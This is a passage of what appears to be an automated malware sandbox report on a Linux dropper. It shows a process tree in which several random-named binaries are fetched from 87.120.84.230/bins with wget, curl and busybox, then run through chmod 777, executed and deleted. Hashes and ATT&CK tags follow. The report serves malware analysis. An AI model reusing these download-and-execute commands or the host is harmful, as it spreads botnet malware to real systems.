/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:1628
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:1631
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:1634
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:1637
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:1640
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:1643
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:1646
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1647
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1649
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1652
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1655
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1658
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97